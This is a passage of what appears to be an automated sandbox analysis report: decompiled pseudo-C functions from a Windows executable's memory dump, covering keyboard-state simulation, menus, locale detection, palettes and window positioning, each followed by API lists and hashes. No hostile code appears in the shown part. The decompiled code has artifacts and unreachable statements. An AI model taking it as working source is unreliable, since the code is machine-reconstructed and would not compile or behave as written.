                                                                                • String ID:
                                                                                • API String ID: 3513720257-0
                                                                                • Opcode ID: 5190dd761afb9cb6777465d1d1d9b02bff82538c644734909bf12f8524cc6476
                                                                                • Instruction ID: 927c149ca72bb9ae92c7face1fd7a0d2d6f86c9ae587c9d497579464b7a0dd95
                                                                                • Opcode Fuzzy Hash: 5190dd761afb9cb6777465d1d1d9b02bff82538c644734909bf12f8524cc6476
                                                                                • Instruction Fuzzy Hash: 0E91A5746092418FC304EF69D995A1A7BE2BF48369F2488BEE4148B372D738FD45CB49
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 82%
                                                                                			E00458744(intOrPtr __eax, void* __ebx, intOrPtr __edx, void* __esi) {
                                                                                				intOrPtr _v8;
                                                                                				intOrPtr _v12;
                                                                                				char _v268;
                                                                                				char _v508;
                                                                                				char _v524;
                                                                                				char _v528;
                                                                                				char _v532;
                                                                                				char _v536;
                                                                                				char _v540;
                                                                                				char _v544;
                                                                                				void* _t75;
                                                                                				intOrPtr _t91;
                                                                                				char* _t97;
                                                                                				signed int _t107;
                                                                                				signed int _t114;
                                                                                				intOrPtr _t121;
                                                                                				intOrPtr _t133;
                                                                                				intOrPtr _t135;
                                                                                				intOrPtr _t146;
                                                                                				int _t152;
                                                                                				intOrPtr _t153;
                                                                                				void* _t163;
                                                                                				void* _t164;
                                                                                				intOrPtr _t165;
                                                                                
                                                                                				_t163 = _t164;
                                                                                				_t165 = _t164 + 0xfffffde4;
                                                                                				_v544 = 0;
                                                                                				_v540 = 0;
                                                                                				_v536 = 0;
                                                                                				_v532 = 0;
                                                                                				_v528 = 0;
                                                                                				_t133 = __edx;
                                                                                				_v8 = __eax;
                                                                                				_push(_t163);
                                                                                				_push(0x4589a4);
                                                                                				_push( *[fs:eax]);
                                                                                				 *[fs:eax] = _t165;
                                                                                				if(__edx >= 1) {
                                                                                					E0045820C(_v8,  &_v528);
                                                                                					if(E0040A92C(_v528, _t133) == 1) {
                                                                                						_t133 = _t133 - 1;
                                                                                					}
                                                                                				}
                                                                                				_v12 = _t133;
                                                                                				if(E00458524(_v8) == 0) {
                                                                                					__eflags = _v12;
                                                                                					if(_v12 < 0) {
                                                                                						__eflags = 0;
                                                                                						_v12 = 0;
                                                                                					}
                                                                                					E0045820C(_v8,  &_v540);
                                                                                					_t75 = E004045D8(_v540);
                                                                                					__eflags = _t75 - _v12;
                                                                                					if(_t75 <= _v12) {
                                                                                						E0045820C(_v8,  &_v544);
                                                                                						_v12 = E004045D8(_v544);
                                                                                					}
                                                                                					E00458720(_v8, _v12, _v12);
                                                                                					goto L21;
                                                                                				} else {
                                                                                					if(_v12 < 0) {
                                                                                						_v12 = 0;
                                                                                					}
                                                                                					_t135 = _v12 + 1;
                                                                                					E0045820C(_v8,  &_v532);
                                                                                					if(_t135 < E004045D8(_v532)) {
                                                                                						E0045820C(_v8,  &_v536);
                                                                                						asm("bt [edx], eax");
                                                                                						if(( *(_v536 + _t135 - 1) & 0x000000ff) < 0) {
                                                                                							_t135 = _t135 + 1;
                                                                                						}
                                                                                					}
                                                                                					_t24 = _v8 + 0x228; // 0xda6855c0
                                                                                					_t91 =  *_t24;
                                                                                					if(_t91 <= _v12) {
                                                                                						_v12 = _t91;
                                                                                						_t135 = _v12;
                                                                                					}
                                                                                					E00458720(_v8, _t135, _t135);
                                                                                					if(_t135 == _v12) {
                                                                                						 *((intOrPtr*)(_v8 + 0x230)) = _v12;
                                                                                						L21:
                                                                                						__eflags = 0;
                                                                                						_pop(_t146);
                                                                                						 *[fs:eax] = _t146;
                                                                                						_push(0x4589ab);
                                                                                						return E00404344( &_v544, 5);
                                                                                					} else {
                                                                                						GetKeyboardState( &_v268);
                                                                                						_t152 = 0x100;
                                                                                						_t97 =  &_v524;
                                                                                						do {
                                                                                							 *_t97 = 0;
                                                                                							_t97 = _t97 + 1;
                                                                                							_t152 = _t152 - 1;
                                                                                							_t177 = _t152;
                                                                                						} while (_t152 != 0);
                                                                                						_v508 = 0x81;
                                                                                						 *((char*)(_t163 + ( *(0x46bc44 + (E004037B0(_v8, _t177) & 0x0000007f) * 2) & 0x0000ffff) - 0x208)) = 0x81;
                                                                                						SetKeyboardState( &_v524);
                                                                                						 *((char*)(_v8 + 0x23c)) = 1;
                                                                                						_push(_t163);
                                                                                						_push(0x458912);
                                                                                						_push( *[fs:eax]);
                                                                                						 *[fs:eax] = _t165;
                                                                                						_t107 = E004037B0(_v8, _t177);
                                                                                						SendMessageA(E0043BD14(_v8), 0x100,  *(0x46bc44 + (_t107 & 0x0000007f) * 2) & 0x0000ffff, 1);
                                                                                						_t114 = E004037B0(_v8, _t177);
                                                                                						SendMessageA(E0043BD14(_v8), 0x101,  *(0x46bc44 + (_t114 & 0x0000007f) * 2) & 0x0000ffff, 1);
                                                                                						_pop(_t153);
                                                                                						 *[fs:eax] = _t153;
                                                                                						_push(0x458919);
                                                                                						_t121 = _v8;
                                                                                						 *((char*)(_t121 + 0x23c)) = 0;
                                                                                						return _t121;
                                                                                					}
                                                                                				}
                                                                                			}




























                                                                                APIs
                                                                                • GetKeyboardState.USER32(?,00000000,004589A4), ref: 0045883F
                                                                                • SetKeyboardState.USER32(00000081), ref: 00458883
                                                                                • SendMessageA.USER32 ref: 004588C8
                                                                                • SendMessageA.USER32 ref: 004588F5
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: KeyboardMessageSendState
                                                                                • String ID:
                                                                                • API String ID: 1999190242-0
                                                                                • Opcode ID: 75fccbb9e0d7dde9b505ef3233f0c149b1207c7e82252a9417013451bf83de29
                                                                                • Instruction ID: 23862da68592c1e24948ec3166a75afe102c93af0ee48796f61bef12c2e153a4
                                                                                • Opcode Fuzzy Hash: 75fccbb9e0d7dde9b505ef3233f0c149b1207c7e82252a9417013451bf83de29
                                                                                • Instruction Fuzzy Hash: 87615DB49006089FCB10EBA9C885ADDB7F4EB58304F6041EAE844B7392DF385F84DB59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 89%
                                                                                			E0044FAC0(void* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
                                                                                				char _v8;
                                                                                				char _v12;
                                                                                				char _v16;
                                                                                				char _v20;
                                                                                				void* _t41;
                                                                                				void* _t54;
                                                                                				void* _t61;
                                                                                				struct HMENU__* _t64;
                                                                                				struct HMENU__* _t70;
                                                                                				intOrPtr _t77;
                                                                                				void* _t79;
                                                                                				intOrPtr _t81;
                                                                                				intOrPtr _t83;
                                                                                				intOrPtr _t87;
                                                                                				void* _t92;
                                                                                				intOrPtr _t98;
                                                                                				void* _t111;
                                                                                				intOrPtr _t113;
                                                                                				void* _t116;
                                                                                
                                                                                				_t109 = __edi;
                                                                                				_push(__edi);
                                                                                				_v20 = 0;
                                                                                				_t113 = __edx;
                                                                                				_t92 = __eax;
                                                                                				_push(_t116);
                                                                                				_push(0x44fc86);
                                                                                				_push( *[fs:eax]);
                                                                                				 *[fs:eax] = _t116 + 0xfffffff0;
                                                                                				if(__edx == 0) {
                                                                                					L7:
                                                                                					_t39 =  *((intOrPtr*)(_t92 + 0x248));
                                                                                					if( *((intOrPtr*)(_t92 + 0x248)) != 0) {
                                                                                						E00448D84(_t39, 0, _t109, 0);
                                                                                					}
                                                                                					if(( *(_t92 + 0x1c) & 0x00000008) != 0 || _t113 != 0 && ( *(_t113 + 0x1c) & 0x00000008) != 0) {
                                                                                						_t113 = 0;
                                                                                					}
                                                                                					 *((intOrPtr*)(_t92 + 0x248)) = _t113;
                                                                                					if(_t113 != 0) {
                                                                                						E0041B98C(_t113, _t92);
                                                                                					}
                                                                                					if(_t113 == 0 || ( *(_t92 + 0x1c) & 0x00000010) == 0 &&  *((char*)(_t92 + 0x229)) == 3) {
                                                                                						_t41 = E0043C018(_t92);
                                                                                						__eflags = _t41;
                                                                                						if(_t41 != 0) {
                                                                                							SetMenu(E0043BD14(_t92), 0);
                                                                                						}
                                                                                						goto L30;
                                                                                					} else {
                                                                                						if( *((char*)( *((intOrPtr*)(_t92 + 0x248)) + 0x5c)) != 0 ||  *((char*)(_t92 + 0x22f)) == 1) {
                                                                                							if(( *(_t92 + 0x1c) & 0x00000010) == 0) {
                                                                                								__eflags =  *((char*)(_t92 + 0x22f)) - 1;
                                                                                								if( *((char*)(_t92 + 0x22f)) != 1) {
                                                                                									_t54 = E0043C018(_t92);
                                                                                									__eflags = _t54;
                                                                                									if(_t54 != 0) {
                                                                                										SetMenu(E0043BD14(_t92), 0);
                                                                                									}
                                                                                								}
                                                                                								goto L30;
                                                                                							}
                                                                                							goto L21;
                                                                                						} else {
                                                                                							L21:
                                                                                							if(E0043C018(_t92) != 0) {
                                                                                								_t61 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t92 + 0x248)))) + 0x34))();
                                                                                								_t110 = _t61;
                                                                                								_t64 = GetMenu(E0043BD14(_t92));
                                                                                								_t138 = _t61 - _t64;
                                                                                								if(_t61 != _t64) {
                                                                                									_t70 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t92 + 0x248)))) + 0x34))();
                                                                                									SetMenu(E0043BD14(_t92), _t70);
                                                                                								}
                                                                                								E00448D84(_t113, E0043BD14(_t92), _t110, _t138);
                                                                                							}
                                                                                							L30:
                                                                                							if( *((char*)(_t92 + 0x22e)) != 0) {
                                                                                								E00450B80(_t92, 1);
                                                                                							}
                                                                                							E0044F9F8(_t92);
                                                                                							_pop(_t98);
                                                                                							 *[fs:eax] = _t98;
                                                                                							_push(0x44fc8d);
                                                                                							return E00404320( &_v20);
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                				_t77 =  *0x487c00; // 0x22e0f1c
                                                                                				_t79 = E00453244(_t77) - 1;
                                                                                				if(_t79 >= 0) {
                                                                                					_v8 = _t79 + 1;
                                                                                					_t111 = 0;
                                                                                					do {
                                                                                						_t81 =  *0x487c00; // 0x22e0f1c
                                                                                						if(_t113 ==  *((intOrPtr*)(E00453230(_t81, _t111) + 0x248))) {
                                                                                							_t83 =  *0x487c00; // 0x22e0f1c
                                                                                							if(_t92 != E00453230(_t83, _t111)) {
                                                                                								_v16 =  *((intOrPtr*)(_t113 + 8));
                                                                                								_v12 = 0xb;
                                                                                								_t87 =  *0x486acc; // 0x41ce84
                                                                                								E00406520(_t87,  &_v20);
                                                                                								E0040A0EC(_t92, _v20, 1, _t111, _t113, 0,  &_v16);
                                                                                								E00403D80();
                                                                                							}
                                                                                						}
                                                                                						_t111 = _t111 + 1;
                                                                                						_t10 =  &_v8;
                                                                                						 *_t10 = _v8 - 1;
                                                                                					} while ( *_t10 != 0);
                                                                                				}
                                                                                			}






















                                                                                0x0044fb23
                                                                                0x0044fb30
                                                                                0x0044fb35
                                                                                0x0044fb44
                                                                                0x0044fb49
                                                                                0x0044fb49
                                                                                0x0044fb1b
                                                                                0x0044fb4e
                                                                                0x0044fb4f
                                                                                0x0044fb4f
                                                                                0x0044fb4f
                                                                                0x0044faf9

                                                                                APIs
                                                                                • GetMenu.USER32(00000000), ref: 0044FBE4
                                                                                • SetMenu.USER32(00000000,00000000), ref: 0044FC01
                                                                                • SetMenu.USER32(00000000,00000000), ref: 0044FC36
                                                                                • SetMenu.USER32(00000000,00000000,00000000,0044FC86), ref: 0044FC52
                                                                                  • Part of subcall function 00406520: LoadStringA.USER32 ref: 00406551
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Menu$LoadString
                                                                                • String ID:
                                                                                • API String ID: 3688185913-0
                                                                                • Opcode ID: 59f43950d7913d04527af4127a480d71e380f0d7e75c0bbe65dfa983d28bef75
                                                                                • Instruction ID: f26370d87fe6636909658d251d97ac89f97443a29d0f9f175af0801ea8a7ce81
                                                                                • Opcode Fuzzy Hash: 59f43950d7913d04527af4127a480d71e380f0d7e75c0bbe65dfa983d28bef75
                                                                                • Instruction Fuzzy Hash: 8751D330A002885AEB60AF7AC8D575A7694AF05308F18557FEC149B397CB3CEC4C8B9D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0040AD70() {
                                                                                				char _v152;
                                                                                				short _v410;
                                                                                				signed short _t14;
                                                                                				signed int _t16;
                                                                                				int _t18;
                                                                                				void* _t20;
                                                                                				void* _t23;
                                                                                				int _t24;
                                                                                				int _t26;
                                                                                				signed int _t30;
                                                                                				signed int _t31;
                                                                                				signed int _t32;
                                                                                				signed int _t37;
                                                                                				int* _t39;
                                                                                				short* _t41;
                                                                                				void* _t49;
                                                                                
                                                                                				 *0x4877f0 = 0x409;
                                                                                				 *0x4877f4 = 9;
                                                                                				 *0x4877f8 = 1;
                                                                                				_t14 = GetThreadLocale();
                                                                                				if(_t14 != 0) {
                                                                                					 *0x4877f0 = _t14;
                                                                                				}
                                                                                				if(_t14 != 0) {
                                                                                					 *0x4877f4 = _t14 & 0x3ff;
                                                                                					 *0x4877f8 = (_t14 & 0x0000ffff) >> 0xa;
                                                                                				}
                                                                                				memcpy(0x46b0c0, 0x40aec4, 8 << 2);
                                                                                				if( *0x46b0ac != 2) {
                                                                                					_t16 = GetSystemMetrics(0x4a);
                                                                                					__eflags = _t16;
                                                                                					 *0x4877fd = _t16 & 0xffffff00 | _t16 != 0x00000000;
                                                                                					_t18 = GetSystemMetrics(0x2a);
                                                                                					__eflags = _t18;
                                                                                					_t31 = _t30 & 0xffffff00 | _t18 != 0x00000000;
                                                                                					 *0x4877fc = _t31;
                                                                                					__eflags = _t31;
                                                                                					if(__eflags != 0) {
                                                                                						return E0040ACF8(__eflags, _t49);
                                                                                					}
                                                                                				} else {
                                                                                					_t20 = E0040AD58();
                                                                                					if(_t20 != 0) {
                                                                                						 *0x4877fd = 0;
                                                                                						 *0x4877fc = 0;
                                                                                						return _t20;
                                                                                					}
                                                                                					E0040ACF8(__eflags, _t49);
                                                                                					_t37 = 0x20;
                                                                                					_t23 = E004030F8(0x46b0c0, 0x20, 0x40aec4);
                                                                                					_t32 = _t30 & 0xffffff00 | __eflags != 0x00000000;
                                                                                					 *0x4877fc = _t32;
                                                                                					__eflags = _t32;
                                                                                					if(_t32 != 0) {
                                                                                						 *0x4877fd = 0;
                                                                                						return _t23;
                                                                                					}
                                                                                					_t24 = 0x80;
                                                                                					_t39 =  &_v152;
                                                                                					do {
                                                                                						 *_t39 = _t24;
                                                                                						_t24 = _t24 + 1;
                                                                                						_t39 =  &(_t39[0]);
                                                                                						__eflags = _t24 - 0x100;
                                                                                					} while (_t24 != 0x100);
                                                                                					_t26 =  *0x4877f0; // 0x409
                                                                                					GetStringTypeA(_t26, 2,  &_v152, 0x80,  &_v410);
                                                                                					_t18 = 0x80;
                                                                                					_t41 =  &_v410;
                                                                                					while(1) {
                                                                                						__eflags =  *_t41 - 2;
                                                                                						_t37 = _t37 & 0xffffff00 |  *_t41 == 0x00000002;
                                                                                						 *0x4877fd = _t37;
                                                                                						__eflags = _t37;
                                                                                						if(_t37 != 0) {
                                                                                							goto L17;
                                                                                						}
                                                                                						_t41 = _t41 + 2;
                                                                                						_t18 = _t18 - 1;
                                                                                						__eflags = _t18;
                                                                                						if(_t18 != 0) {
                                                                                							continue;
                                                                                						} else {
                                                                                							return _t18;
                                                                                						}
                                                                                						L18:
                                                                                					}
                                                                                				}
                                                                                				L17:
                                                                                				return _t18;
                                                                                				goto L18;
                                                                                			}

                                                                                APIs
                                                                                • GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0040AE64
                                                                                • GetThreadLocale.KERNEL32 ref: 0040AD9A
                                                                                  • Part of subcall function 0040ACF8: GetCPInfo.KERNEL32(00000000,?), ref: 0040AD11
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: InfoLocaleStringThreadType
                                                                                • String ID:
                                                                                • API String ID: 1505017576-0
                                                                                • Opcode ID: 0e1c3126f2dfff17c11bd57b361e3b5cd354b25a85c6cacead5f27272a7d8c4f
                                                                                • Instruction ID: 7b20ac4ac1a8ba6006ade8caa557296e2a43b71a996097c4bdc0da4cb0750b93
                                                                                • Opcode Fuzzy Hash: 0e1c3126f2dfff17c11bd57b361e3b5cd354b25a85c6cacead5f27272a7d8c4f
                                                                                • Instruction Fuzzy Hash: 9D3154315883468AE7109725ED25B9B3794EB01300F6484BFEC54AB3C1DB3C9855C7AF
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 75%
                                                                                			E00422DCC(intOrPtr __eax, void* __edx) {
                                                                                				intOrPtr _v8;
                                                                                				void* __ebx;
                                                                                				void* __ecx;
                                                                                				void* __esi;
                                                                                				void* __ebp;
                                                                                				intOrPtr _t33;
                                                                                				intOrPtr _t59;
                                                                                				struct HDC__* _t69;
                                                                                				void* _t70;
                                                                                				intOrPtr _t79;
                                                                                				void* _t84;
                                                                                				struct HPALETTE__* _t85;
                                                                                				intOrPtr _t87;
                                                                                				intOrPtr _t89;
                                                                                
                                                                                				_t87 = _t89;
                                                                                				_push(_t70);
                                                                                				_v8 = __eax;
                                                                                				_t33 = _v8;
                                                                                				if( *((intOrPtr*)(_t33 + 0x58)) == 0) {
                                                                                					return _t33;
                                                                                				} else {
                                                                                					E0041FA80(_v8);
                                                                                					_push(_t87);
                                                                                					_push(0x422eab);
                                                                                					_push( *[fs:eax]);
                                                                                					 *[fs:eax] = _t89;
                                                                                					E004240E8( *((intOrPtr*)(_v8 + 0x58)));
                                                                                					E00422C48( *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 8));
                                                                                					E004242C8( *((intOrPtr*)(_v8 + 0x58)));
                                                                                					_t69 = CreateCompatibleDC(0);
                                                                                					_t84 =  *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 8);
                                                                                					if(_t84 == 0) {
                                                                                						 *((intOrPtr*)(_v8 + 0x5c)) = 0;
                                                                                					} else {
                                                                                						 *((intOrPtr*)(_v8 + 0x5c)) = SelectObject(_t69, _t84);
                                                                                					}
                                                                                					_t85 =  *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 0x10);
                                                                                					if(_t85 == 0) {
                                                                                						 *((intOrPtr*)(_v8 + 0x60)) = 0;
                                                                                					} else {
                                                                                						 *((intOrPtr*)(_v8 + 0x60)) = SelectPalette(_t69, _t85, 0xffffffff);
                                                                                						RealizePalette(_t69);
                                                                                					}
                                                                                					E0041FE44(_v8, _t69);
                                                                                					_t59 =  *0x46b788; // 0x22e0b74
                                                                                					E0041428C(_t59, _t69, _t70, _v8, _t85);
                                                                                					_pop(_t79);
                                                                                					 *[fs:eax] = _t79;
                                                                                					_push(0x422eb2);
                                                                                					return E0041FC98(_v8);
                                                                                				}
                                                                                			}


















                                                                                APIs
                                                                                  • Part of subcall function 0041FA80: RtlEnterCriticalSection.KERNEL32(00487A5C,00000000,0041E21E,00000000,0041E27D), ref: 0041FA88
                                                                                  • Part of subcall function 0041FA80: RtlLeaveCriticalSection.KERNEL32(00487A5C,00487A5C,00000000,0041E21E,00000000,0041E27D), ref: 0041FA95
                                                                                  • Part of subcall function 0041FA80: RtlEnterCriticalSection.KERNEL32(00000038,00487A5C,00487A5C,00000000,0041E21E,00000000,0041E27D), ref: 0041FA9E
                                                                                  • Part of subcall function 004242C8: GetDC.USER32(00000000), ref: 0042431E
                                                                                  • Part of subcall function 004242C8: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00424333
                                                                                  • Part of subcall function 004242C8: GetDeviceCaps.GDI32(00000000,0000000E), ref: 0042433D
                                                                                  • Part of subcall function 004242C8: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,00422E1F,00000000,00422EAB), ref: 00424361
                                                                                  • Part of subcall function 004242C8: ReleaseDC.USER32 ref: 0042436C
                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 00422E21
                                                                                • SelectObject.GDI32(00000000,?), ref: 00422E3A
                                                                                • SelectPalette.GDI32(00000000,?,000000FF), ref: 00422E63
                                                                                • RealizePalette.GDI32(00000000), ref: 00422E6F
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: CriticalPaletteSection$CapsCreateDeviceEnterSelect$CompatibleHalftoneLeaveObjectRealizeRelease
                                                                                • String ID:
                                                                                • API String ID: 979337279-0
                                                                                • Opcode ID: 40b5213d90e1f6223c6eae0d1e643623537daa9ac4c850ee3c106ff55ed6b37c
                                                                                • Instruction ID: e9a11356e23c73f42dbca714b493990e2baf7ab793a4ed1f979a99725cee0618
                                                                                • Opcode Fuzzy Hash: 40b5213d90e1f6223c6eae0d1e643623537daa9ac4c850ee3c106ff55ed6b37c
                                                                                • Instruction Fuzzy Hash: 9331F874B00614EFC704EB59D981D4EB3F5EF48314B6241A6E404AB362D678AE80EB44
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00449170(void* __eax, struct HMENU__* __edx, int _a4, int _a8, CHAR* _a12) {
                                                                                				intOrPtr _v8;
                                                                                				void* __ecx;
                                                                                				void* __edi;
                                                                                				int _t27;
                                                                                				void* _t40;
                                                                                				int _t41;
                                                                                				int _t50;
                                                                                
                                                                                				_t50 = _t41;
                                                                                				_t49 = __edx;
                                                                                				_t40 = __eax;
                                                                                				if(E0044887C(__eax) == 0) {
                                                                                					return GetMenuStringA(__edx, _t50, _a12, _a8, _a4);
                                                                                				}
                                                                                				_v8 = 0;
                                                                                				if((GetMenuState(__edx, _t50, _a4) & 0x00000010) == 0) {
                                                                                					_t27 = GetMenuItemID(_t49, _t50);
                                                                                					_t51 = _t27;
                                                                                					if(_t27 != 0xffffffff) {
                                                                                						_v8 = E004486F8(_t40, 0, _t51);
                                                                                					}
                                                                                				} else {
                                                                                					_t49 = GetSubMenu(_t49, _t50);
                                                                                					_v8 = E004486F8(_t40, 1, _t37);
                                                                                				}
                                                                                				if(_v8 == 0) {
                                                                                					return 0;
                                                                                				} else {
                                                                                					 *_a12 = 0;
                                                                                					E00408BFC(_a12, _a8,  *((intOrPtr*)(_v8 + 0x30)));
                                                                                					return E00408B40(_a12, _t49);
                                                                                				}
                                                                                			}











                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Menu$ItemStateString
                                                                                • String ID:
                                                                                • API String ID: 306270399-0
                                                                                • Opcode ID: a51c3bca0f35a20612332bc3a4a573b4f11e14603d658cd76a0853a35b361683
                                                                                • Instruction ID: e1c24750740d557e1e8c84f7fe76103c4d55c31368cde85f8e0fd78e7a4e0c38
                                                                                • Opcode Fuzzy Hash: a51c3bca0f35a20612332bc3a4a573b4f11e14603d658cd76a0853a35b361683
                                                                                • Instruction Fuzzy Hash: 7011B431301214AFE700EE6DCC85DAF77E8AF49354B10446EF919E7382CA38ED01A7A8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0045AF4C(intOrPtr* __eax, int __ecx, RECT* __edx) {
                                                                                				int _t9;
                                                                                				int _t12;
                                                                                				int _t26;
                                                                                				int _t34;
                                                                                				int _t37;
                                                                                				intOrPtr* _t43;
                                                                                				int* _t44;
                                                                                
                                                                                				_t37 = __ecx;
                                                                                				_t44 = __edx;
                                                                                				_t43 = __eax;
                                                                                				_t9 = IsRectEmpty(__edx);
                                                                                				_t47 = _t9;
                                                                                				if(_t9 != 0) {
                                                                                					return E0045AEE4(_t43, _t47);
                                                                                				}
                                                                                				 *((intOrPtr*)( *_t43 + 0x94))();
                                                                                				__eflags = _t37;
                                                                                				if(_t37 != 0) {
                                                                                					L5:
                                                                                					_t12 = 1;
                                                                                				} else {
                                                                                					_t34 = IsWindowVisible(E0043BD14(_t43));
                                                                                					__eflags = _t34;
                                                                                					if(_t34 == 0) {
                                                                                						goto L5;
                                                                                					} else {
                                                                                						_t12 = 0;
                                                                                					}
                                                                                				}
                                                                                				E0045AE60(_t43);
                                                                                				SetWindowPos(E0043BD14(_t43), 0,  *_t44, _t44[1], _t44[2] -  *_t44, _t44[3] - _t44[1], 0x48);
                                                                                				 *((intOrPtr*)( *_t43 + 0xf8))();
                                                                                				__eflags = _t12;
                                                                                				if(__eflags != 0) {
                                                                                					E0045AE60(_t43);
                                                                                				}
                                                                                				_t26 = E004037B0( *((intOrPtr*)(_t43 + 0x240)), __eflags);
                                                                                				__eflags = _t26;
                                                                                				if(_t26 != 0) {
                                                                                					return SetFocus(E0043BD14(_t43));
                                                                                				}
                                                                                				return _t26;
                                                                                			}











                                                                                APIs
                                                                                • IsRectEmpty.USER32 ref: 0045AF57
                                                                                • IsWindowVisible.USER32(00000000), ref: 0045AF82
                                                                                • SetWindowPos.USER32(00000000,00000000,?,?,?,?,00000048,?,?,?,?,0045B063,0045FEAC), ref: 0045AFBA
                                                                                • SetFocus.USER32(00000000,?,?,?,?,00000048,?,?,?,?,0045B063,0045FEAC), ref: 0045AFEF
                                                                                  • Part of subcall function 0045AEE4: IsWindowVisible.USER32(00000000), ref: 0045AEFB
                                                                                  • Part of subcall function 0045AEE4: SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,0000008C,00000000,?,?,0045FD56,0045FD5E,?,?,0045B6B4), ref: 0045AF22
                                                                                  • Part of subcall function 0045AEE4: SetFocus.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,0000008C,00000000,?,?,0045FD56,0045FD5E,?,?,0045B6B4), ref: 0045AF42
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
